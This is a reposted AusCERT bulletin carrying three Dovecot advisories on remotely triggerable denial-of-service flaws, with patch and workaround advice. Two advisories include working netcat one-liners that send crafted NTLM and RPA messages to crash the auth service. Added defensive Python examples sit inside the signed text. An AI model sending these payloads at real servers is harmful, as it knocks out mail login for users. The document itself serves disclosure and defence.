Malware Devil

Friday, August 14, 2020

ESB-2020.2808 – [UNIX/Linux] Dovecot: Denial of service – Remote/unauthenticated

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

===========================================================================
             AUSCERT External Security Bulletin Redistribution

                               ESB-2020.2808
               Dovecot v2.3.11.3 fixes three vulnerabilities
                              14 August 2020

===========================================================================

        AusCERT Security Bulletin Summary
        ---------------------------------

Product:           Dovecot
Publisher:         Dovecot
Operating System:  UNIX variants (UNIX, Linux, OSX)
Impact/Access:     Denial of Service -- Remote/Unauthenticated
Resolution:        Patch/Upgrade
CVE Names:         CVE-2020-12674 CVE-2020-12673 CVE-2020-12100

Reference:         ESB-2020.2790

Original Bulletin: 
   https://dovecot.org/pipermail/dovecot-news/2020-August/000441.html
   https://dovecot.org/pipermail/dovecot-news/2020-August/000442.html
   https://dovecot.org/pipermail/dovecot-news/2020-August/000443.html

Comment: This bulletin contains three (3) Dovecot security advisories.

- --------------------------BEGIN INCLUDED TEXT--------------------

[Dovecot-news] CVE-2020-12100: Receiving mail with deeply nested MIME parts
leads to resource exhaustion.

Open-Xchange Security Advisory 2020-08-12

Affected product: Dovecot IMAP server
Internal reference: DOP-1849 (Bug ID)
Vulnerability type: Uncontrolled recursion (CWE-674)
Vulnerable version: 2.0
Vulnerable component: submission, lmtp, lda
Fixed version: 2.3.11.3
Report confidence: Confirmed
Solution status: Fix available
Vendor notification: 2020-04-23
CVE reference: CVE-2020-12100
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Vulnerability Details:
Receiving mail with deeply nested MIME parts leads to resource exhaustion
as Dovecot attempts to parse it.

Risk:
Malicious actor can cause denial of service to mail delivery by repeatedly
sending mails with bad content.

Workaround:
Limit MIME structures in MTA.

Solution:
Upgrade to fixed version.

Best regards,

Aki Tuomi
Open-Xchange oy
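The workaround above ("limit MIME structures in MTA") can be applied as a pre-delivery gate in front of the lda, lmtp and submission services. The following is an added illustration written for this bulletin, not Dovecot's code or Dovecot's fix: it walks a parsed MIME tree with an explicit stack, rejects anything deeper than an assumed site policy value (MAX_MIME_DEPTH), and treats a parser that blows its own stack as a rejection too. The nested messages it builds are constructed test data.

```python
"""
MIME nesting-depth gate for an MTA pre-delivery hook (added example).
Not Dovecot's code and not Dovecot's fix: it shows one way to apply the
advisory's workaround ("limit MIME structures in MTA") before a message
reaches the lda/lmtp/submission services. MAX_MIME_DEPTH is an assumed
site policy value, and the nested messages built below are constructed
test data.
"""
import email
from email import policy
from email.message import EmailMessage

MAX_MIME_DEPTH = 10  # assumed site policy: real mail rarely nests beyond a few levels


def nesting_depth(msg) -> int:
    """Walk the MIME tree with an explicit stack (no recursion) and return
    the deepest level reached; a flat single-part message has depth 1."""
    deepest = 0
    stack = [(msg, 1)]
    while stack:
        part, depth = stack.pop()
        deepest = max(deepest, depth)
        if part.is_multipart():
            for child in part.get_payload():
                stack.append((child, depth + 1))
    return deepest


def check_message(raw: bytes, limit: int = MAX_MIME_DEPTH):
    """Return (accept, depth) for a raw RFC 5322 message.

    Python's own feedparser recurses once per multipart level, so a message
    deep enough to exhaust *its* stack raises RecursionError; that is treated
    as a rejection as well, because a parser falling over is exactly the
    failure mode the limit exists to prevent."""
    try:
        msg = email.message_from_bytes(raw, policy=policy.default)
    except RecursionError:
        return False, -1
    depth = nesting_depth(msg)
    return depth <= limit, depth


def build_nested(levels: int) -> bytes:
    """Construct a message with `levels` multipart/mixed wrappers around one
    text part (constructed test data only)."""
    part = EmailMessage()
    part.set_content("hello")
    for _ in range(levels):
        wrapper = EmailMessage()
        wrapper.make_mixed()
        wrapper.attach(part)
        part = wrapper
    part["From"] = "sender@example.invalid"
    part["To"] = "rcpt@example.invalid"
    part["Subject"] = f"nested {levels} levels"
    return part.as_bytes()


if __name__ == "__main__":
    for levels in (0, 3, 20):
        accept, depth = check_message(build_nested(levels))
        print(f"{levels:>2} wrappers -> depth {depth:>2}: {'accept' if accept else 'REJECT'}")
```

The gate runs on the MTA side, so a rejected message never reaches the Dovecot delivery agents; the limit value is a policy choice and should be set from what legitimate traffic on the site actually looks like.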

- --------------------------------------------------------------------------------

[Dovecot-news] CVE-2020-12673: Specially crafted NTLM package can crash auth
service

Open-Xchange Security Advisory 2020-08-12

Affected product: Dovecot IMAP server
Internal reference: DOP-1870 (Bug ID)
Vulnerability type: CWE-789 (Uncontrolled Memory Allocation)
Vulnerable version: 2.2
Vulnerable component: auth
Fixed version: 2.3.11.3
Report confidence: Confirmed
Solution status: Fix available
Vendor notification: 2020-05-03
CVE reference: CVE-2020-12673
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Vulnerability Details:
Dovecot's NTLM implementation does not correctly check message buffer
size, which leads to reading past the allocation, which can lead to a crash.

Risk:
An adversary can use this vulnerability to crash dovecot auth process
repeatedly, preventing login.

Steps to reproduce:
(echo 'AUTH NTLM';
 echo -ne 'NTLMSSP\x00\x01\x00\x00\x00\x00\x02\x00\x00AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA' | base64 -w0; echo;
 echo -ne 'NTLMSSP\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00AA\x00\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00orange\x00' | base64 -w0; echo;
 echo QUIT) | nc 127.0.0.1 110

Workaround:
Disable NTLM authentication.

Solution:
Upgrade to fixed version.

Best regards,
Aki Tuomi
Open-Xchange oy

- --------------------------------------------------------------------------------

[Dovecot-news] CVE-2020-12674: Specially crafted RPA authentication message
crashes auth

Open-Xchange Security Advisory 2020-08-12

Affected product: Dovecot IMAP server
Internal reference: DOP-1869 (Bug ID)
Vulnerability type: CWE-126 (Buffer over-read)
Vulnerable version: 2.2
Vulnerable component: auth
Fixed version: 2.3.11.3
Report confidence: Confirmed
Solution status: Fix available
Vendor notification: 2020-05-03
Researcher credit: Orange from DEVCORE team
CVE reference: CVE-2020-12674
CVSS: 7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

Vulnerability Details:
Dovecot's RPA mechanism implementation accepts a zero-length message,
which leads to an assert-crash later on.

Risk:
An adversary can use this vulnerability to crash dovecot auth process
repeatedly, preventing login.

Steps to reproduce:
(echo 'AUTH RPA';
 echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x01\x00\x04\x00\x00\x01' | base64 -w 0; echo;
 echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x00\x03A@A\x00' | base64 -w 0; echo;
 echo QUIT) | nc 127.0.0.1 110

Workaround:
Disable RPA authentication.

Solution:
Upgrade to fixed version.

Best regards,
Aki Tuomi
Open-Xchange oy
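Both auth-service bugs above come down to trusting lengths the client supplied (CVE-2020-12673: security-buffer offsets and lengths inside an NTLM message; CVE-2020-12674: a message with no bytes at all). The following added example, written for this bulletin and not taken from Dovecot, shows the length-before-read discipline that closes that class: each NTLM Type 3 security buffer (the public NTLMSSP layout of a 16-bit length, 16-bit allocated size and 32-bit offset) is checked against the real message size before any byte is dereferenced, and an empty message is refused up front. The sample messages, including the one that claims 0x4141 bytes of user name with only six bytes of body present, are constructed for the example and are not the advisory's own payloads.

```python
"""
Bounds-checked NTLM Type 3 (AUTHENTICATE) parsing as a defensive example.
Added here as an illustration, not Dovecot's code or Dovecot's fix. The
wire layout (8-byte "NTLMSSP\\0" signature, 4-byte little-endian message
type, then 8-byte security buffers of <len:u16, maxlen:u16, offset:u32>)
is the public NTLMSSP format; all sample messages below are constructed.
"""
import struct

NTLM_SIGNATURE = b"NTLMSSP\x00"
NTLM_AUTHENTICATE = 3
# The five mandatory security buffers of a Type 3 message, in wire order.
TYPE3_BUFFERS = ("lm_response", "nt_response", "domain", "user", "workstation")
TYPE3_FIXED_LEN = len(NTLM_SIGNATURE) + 4 + 8 * len(TYPE3_BUFFERS)  # 52 bytes


class NtlmError(ValueError):
    """Raised for any message that cannot be parsed without reading past its end."""


def read_security_buffer(data: bytes, pos: int) -> bytes:
    """Decode the security buffer at `pos` and return the bytes it refers to,
    refusing to read outside `data`. Python ints do not wrap, so the
    offset + length comparison cannot overflow the way a C size_t add can."""
    if pos + 8 > len(data):
        raise NtlmError(f"security buffer at {pos} is truncated")
    length, _maxlen, offset = struct.unpack_from("<HHI", data, pos)
    if length and offset < TYPE3_FIXED_LEN:
        raise NtlmError(f"security buffer at {pos} overlaps the fixed header")
    if offset + length > len(data):
        raise NtlmError(
            f"security buffer at {pos} points outside the message "
            f"(offset={offset}, len={length}, message={len(data)})")
    return data[offset:offset + length]


def parse_type3(data: bytes) -> dict:
    """Parse an NTLM AUTHENTICATE message; every read is length-checked first.
    An empty or short message is rejected before anything is dereferenced,
    the same rule the RPA zero-length case needed."""
    if len(data) < TYPE3_FIXED_LEN:
        raise NtlmError(f"message too short: {len(data)} < {TYPE3_FIXED_LEN}")
    if data[:8] != NTLM_SIGNATURE:
        raise NtlmError("bad NTLMSSP signature")
    (msg_type,) = struct.unpack_from("<I", data, 8)
    if msg_type != NTLM_AUTHENTICATE:
        raise NtlmError(f"expected message type 3, got {msg_type}")
    return {name: read_security_buffer(data, 12 + 8 * i)
            for i, name in enumerate(TYPE3_BUFFERS)}


def build_type3(**fields: bytes) -> bytes:
    """Build a well-formed Type 3 message (constructed test data)."""
    header = NTLM_SIGNATURE + struct.pack("<I", NTLM_AUTHENTICATE)
    buffers, body = b"", b""
    for name in TYPE3_BUFFERS:
        value = fields.get(name, b"")
        buffers += struct.pack("<HHI", len(value), len(value), TYPE3_FIXED_LEN + len(body))
        body += value
    return header + buffers + body


def overclaiming_type3() -> bytes:
    """Constructed message whose user buffer claims 0x4141 bytes starting just
    past the header while only six bytes of body are present."""
    header = NTLM_SIGNATURE + struct.pack("<I", NTLM_AUTHENTICATE)
    buffers = struct.pack("<HHI", 0, 0, TYPE3_FIXED_LEN) * 3       # lm, nt, domain: empty
    buffers += struct.pack("<HHI", 0x4141, 0, TYPE3_FIXED_LEN)     # user: oversized claim
    buffers += struct.pack("<HHI", 0, 0, TYPE3_FIXED_LEN)          # workstation: empty
    return header + buffers + b"orange"


def classify(data: bytes) -> str:
    """Return 'ok' for a parsable message, otherwise a short rejection reason."""
    try:
        parse_type3(data)
        return "ok"
    except NtlmError as exc:
        return f"reject: {exc}"


if __name__ == "__main__":
    good = build_type3(lm_response=b"\x00" * 24, nt_response=b"\x00" * 24,
                       domain=b"EXAMPLE", user=b"alice", workstation=b"ws1")
    for label, sample in (("well-formed", good), ("over-claiming", overclaiming_type3()),
                          ("empty", b""), ("truncated", good[:-1])):
        print(f"{label:>13}: {classify(sample)}")
```

The point is where the checks sit: the message length is compared against the fixed header before the header is read, and each buffer's offset and length are compared against the message before the buffer is read, so a crafted length can only produce a clean rejection, never an over-read of the auth process's memory.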

- --------------------------END INCLUDED TEXT--------------------

You have received this e-mail bulletin as a result of your organisation's
registration with AusCERT. The mailing list you are subscribed to is
maintained within your organisation, so if you do not wish to continue
receiving these bulletins you should contact your local IT manager. If
you do not know who that is, please send an email to auscert@auscert.org.au
and we will forward your request to the appropriate person.

NOTE: Third Party Rights
This security bulletin is provided as a service to AusCERT's members.  As
AusCERT did not write the document quoted above, AusCERT has had no control
over its content. The decision to follow or act on information or advice
contained in this security bulletin is the responsibility of each user or
organisation, and should be considered in accordance with your organisation's
site policies and procedures. AusCERT takes no responsibility for consequences
which may arise from following or acting on information or advice contained in
this security bulletin.

NOTE: This is only the original release of the security bulletin.  It may
not be updated when updates to the original are made.  If downloading at
a later date, it is recommended that the bulletin is retrieved directly
from the author's website to ensure that the information is still current.

Contact information for the authors of the original document is included
in the Security Bulletin above.  If you have any questions or need further
information, please contact them directly.

Previous advisories and external security bulletins can be retrieved from:

        https://www.auscert.org.au/bulletins/

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================
-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQIVAwUBXzX0QuNLKJtyKPYoAQiFSQ//eg8y0WYR9fR0DF+R+GmC6CTZ34usA4PA
sdeUImD3XU96QS/xicR4BGqL4WKbg5BfIr3lrlI4sKxp+iBd+OOXUbkUiT183tpA
5ws3MHT1r4f/Bz0Vx1cXSg0TrzSwWEau/2Xbw4CcYRnsOlInU4KW12fAFqGkWtds
aeuQU7ZIT1uN9S0dgP4djif4AUlkpDUWOQOVb6i3Z4PEgAg3P7hM1gPFe6GPJC5y
SHktVU6B98JzrxgL2H1KmRJTBh3jjY9bs0ihoI2W6HOuFWKOWcYYxaPLkUBsK3QU
uLaWOsQhnoNt+MtWQ78elvQ62lEXwqjf3A//Iyv3G2YcTei7eibBo5qtY3eNhBiz
AAhw9+9N+zYk4mRQM+DrEBfIEyVnYC8JWdlIw361WIwEn/VQduWqBRTpJeZAKiqH
898QFbefgsPkkuFeBX0QOU/4GkN+Qr55IfCbyuy4+Joh2NlN6WQMzYrpVO8HA2L2
DxJxg7rlCzdqf5a+amWUR66zmJxnEADBrdW3DVcaCgbpfmPhq1nP1vWfcO7VwsGY
i+JKguX5ga/djiEETUsIyPFeicUnZjJzDUMKrzRGooPJZmx5Rhb416EAg22IvdAq
gaPlhQ88LkrD7X1lUF5NrxasFDekP8gj6N2hPtfeycaPchdEfL2pLNrmAsOsS0oY
MHKMHFrhOjM=
=E+4T
-----END PGP SIGNATURE-----
